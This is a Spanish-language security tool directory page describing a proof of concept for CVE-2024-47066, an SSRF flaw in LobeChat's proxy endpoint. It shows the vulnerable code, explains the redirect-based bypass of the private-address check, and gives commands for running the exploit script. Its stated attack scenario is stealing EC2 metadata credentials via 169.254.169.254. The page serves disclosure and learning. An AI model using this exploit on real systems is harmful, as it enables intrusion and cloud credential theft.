Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-47066 — Prueba de concepto para CVE-2024-47066 | Kitploit
Herramientas/GitHubGitHub/l8bl/cve-2024-47066
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónSeguridad en la Nube
GitHubl8bl/cve-2024-47066

CVE-2024-47066

Prueba de concepto para CVE-2024-47066

Ver Repositorio
41hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-47066

★ CVE-2024-47066 PoC de SSRF de LobeChat ★

Descripción

CVE-2024-47066 : Lobe Chat es un framework de chat de inteligencia artificial de código abierto. Antes de la versión 1.19.13, la protección contra server-side request forgery implementada en src/app/api/proxy/route.ts no consideraba las redirecciones y podía ser omitida cuando un atacante proporcionaba una URL maliciosa externa que redirige a recursos internos como una red privada o una dirección de loopback. La versión 1.19.13 contiene una corrección mejorada para este problema.

Reportero: a1loy

https://github.com/user-attachments/assets/2c4a3be0-5732-48f5-a96c-d361fd914fec

Cómo usar

Clonar con Git

root@kitploit:~
git clone https://github.com/l8BL/CVE-2024-47066.git
cd CVE-2024-47066

Configurar el entorno vulnerable

root@kitploit:~
cd docker
docker-compose up -d

(Externo) LodeChat --> ATAQUE SSRF --> (Interno) http://www.internal-service:4000

Instalar paquetes

root@kitploit:~
pip install -r requirements.txt

Comando

root@kitploit:~
python3 CVE-2024-47066.py -v <URL_TO_EXPLOIT> -i <URL_TO_REQUEST>

Ejemplo

root@kitploit:~
python3 CVE-2024-47066.py -v http://localhost:3210 -i http://www.internal-service:4000

Salida

CVE-2024-47066 alt text

Resultado

alt text

Análisis

Punto vulnerable (/app/api/proxy/route.ts)

root@kitploit:~
import { isPrivate } from 'ip';
import { NextResponse } from 'next/server';
import dns from 'node:dns';
import { promisify } from 'node:util';

const lookupAsync = promisify(dns.lookup);

export const runtime = 'nodejs';

/**
 * just for a proxy
 */
export const POST = async (req: Request) => {
  const url = new URL(await req.text());
  let address;

  try {
    const lookupResult = await lookupAsync(url.hostname);
    address = lookupResult.address;
  } catch (err) {
    console.error(`${url.hostname} DNS parser error:`, err);

    return NextResponse.json({ error: 'DNS parser error' }, { status: 504 });
  }

  const isInternalHost = isPrivate(address);

  if (isInternalHost)
    return NextResponse.json({ error: 'Not support internal host proxy' }, { status: 400 });

  const res = await fetch(url.toString());

  return new Response(res.body, { headers: res.headers });
};

A partir de la línea 26, no hay ninguna comprobación que determine la respuesta de redirección. Por lo tanto, al utilizar un acortador de URL, se puede omitir fácilmente la función "isPrivate()".

Escenario de ataque

Robar credenciales de metadatos EC2

Realizar una solicitud a http://169.254.169.254

Descargo de responsabilidad

Este repositorio no pretende ser un exploit de SSRF para CVE-2024-47066. El propósito de este proyecto es ayudar a las personas a aprender sobre esta vulnerabilidad y, quizás, probar sus propias aplicaciones.

Referencia

https://github.com/advisories/GHSA-3fc8-2r3f-8wrg

Descargar herramienta